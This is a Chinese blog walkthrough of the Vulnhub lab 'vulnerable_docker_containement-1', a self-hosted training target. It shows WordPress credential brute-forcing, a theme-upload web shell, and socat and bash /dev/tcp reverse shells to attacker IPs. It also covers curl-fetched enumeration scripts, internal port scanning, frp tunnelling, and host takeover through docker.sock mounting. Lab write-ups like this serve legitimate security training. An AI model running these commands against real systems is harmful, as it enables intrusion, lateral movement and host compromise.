【甄选靶场】 Vulnhub百个项目渗透——项目三十五:vulnerable_docker_containement-1(文件上传,docker提权)

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目三十五:vulnerable_docker_containement-1(文件上传,docker提权)


🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月8日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!


前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。


信息收集

nmap -sS -sV -A -T5 [ip]

在这里插入图片描述
发现了8000的web,并且是wordpress,那就用wpscan

wpscan利用

wpscan --url http://192.168.253.182:8000/ -eu
存在:bob用户

dirb http://192.168.253.182:8000/
发现登录页面
http://192.168.253.182:8000/admin
在这里插入图片描述
用户名枚举出bob

WPForce爆破

WPForce爆破:
https://github.com/n00py/WPForce
proxychains4 git clone https://github.com/n00py/WPForce.git

密码字典合集:
https://github.com/danielmiessler/SecLists

把bob写到user.txt中
python wpforce.py -i user.txt -w 10-million-password-list-top-10000.txt -u http://192.168.253.182:8000/

{'bob': 'Welcome1'}
---------
或者用wpscan、bp也可以!

wp文件上传

已经做了很多次了,apperence->add new,然后就能看到地址,本地开个端口接shell然后访问url即可

在这里插入图片描述

这里可以再反弹一下,生成稳定shell

没有装wget,所以用curl
curl -O http://192.168.253.138:8082/socat
chmod +x socat

nc -vlp 9998
HOME=/dev/shm ./socat tcp:192.168.253.138:9998 exec:'/bin/bash -li',pty,stderr,sigint,sighup,sigquit,sane

使用script:(没太大必要)
script -qc bash /dev/null

stty raw -echo
fg

提权

没有wget 利用curl上传提权三脚本

curl -# -O http://192.168.253.138:8082/linpeas.sh

在这里插入图片描述

1)Linux version 3.13.0-128-generic (无法内核提权)

2)多个网卡信息:
172.18.0.1 dev eth0 lladdr 02:42:78:42:eb:c8 REACHABLE
172.18.0.4 dev eth0 lladdr 02:42:ac:12:00:04 REACHABLE IP address HW type Flags HW address Mask Device
172.18.0.1 0x1 0x2 02:42:78:42:eb:c8 * eth0
172.18.0.4 0x1 0x2 02:42:ac:12:00:04 * eth0

3)mysql信息泄露: /var/www/html/wp-config.php define(‘DB_NAME’,
‘wordpress’); define(‘DB_USER’, ‘wordpress’); define(‘DB_PASSWORD’,
‘WordPressISBest’); define(‘DB_HOST’, ‘db:3306’); define(
‘WP_SITEURL’, ‘http://’ . $_SERVER[‘HTTP_HOST’] ); define( ‘WP_HOME’,
‘http://’ . $_SERVER[‘HTTP_HOST’] );

4)Current: = cap_chown

无法内核提权,也没有sudo滥用,多网卡是开启了docker,靶场名字也有提示。那就看一下内网第一台机器的ip,因为ifconfig被禁用了

在这里插入图片描述

深入探测

手工探测IP
for i in {1..254}; do (ping -c 1 172.18.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
手工探测端口

本地写好传上去赋权执行

#!/bin/bash
hosts=(
"172.18.0.1"
"172.18.0.2"
"172.18.0.3"
"172.18.0.4"
)
END=65535
for host in "${hosts[@]}"
do
	   echo "==============================="
	   echo "Scanning $host"
	   echo "==============================="
	       for ((port=1;port<=END;port++))
	       do
	       echo "" > /dev/tcp/$host/$port && echo "Port $port is open"
	done 2>/dev/null
done

在这里插入图片描述

得到结果如下

在这里插入图片描述

内网穿越

利用frpc

  1. 修改frpc.ini
  2. 赋权执行frps
  3. 上传frpc以及frpc.ini
  4. 赋权执行frpc
./frps -c frps.ini     ---本机执行
./frpc -c frpc.ini       --curl上传到
gedit /etc/proxychains4.conf   --本机(或者proxychains.conf )
最后一行加上:socks5 192.168.253.138 7777

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

proxychains nmap -sT -sV -Pn -n -p8022 172.18.0.3

在这里插入图片描述

在经过尝试之后,锁定了这台开有8022的机器

在这里插入图片描述

浏览器插件中添加代理

在这里插入图片描述

发现是一个docker的shell
受限很大,考虑端口转发

bash -i >& /dev/tcp/192.168.247.129/6666 0>&1

在这里插入图片描述

在这里插入图片描述
拿到shell以后,发现了在run目录下有docker.sock
基本判定存在 Docker Remote api漏洞
再查看一下宿主其他容器
发现没有装docker

安装docker

vim /etc/apt/sources.list
apt-get update
apt-get install docker.io
docker ps

挂载主机上的所有文件到一个目录
docker run --rm -it -v /:/tmp/1/ wordpress /bin/bash
或
docker run -v /:/host -t -i bash

在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值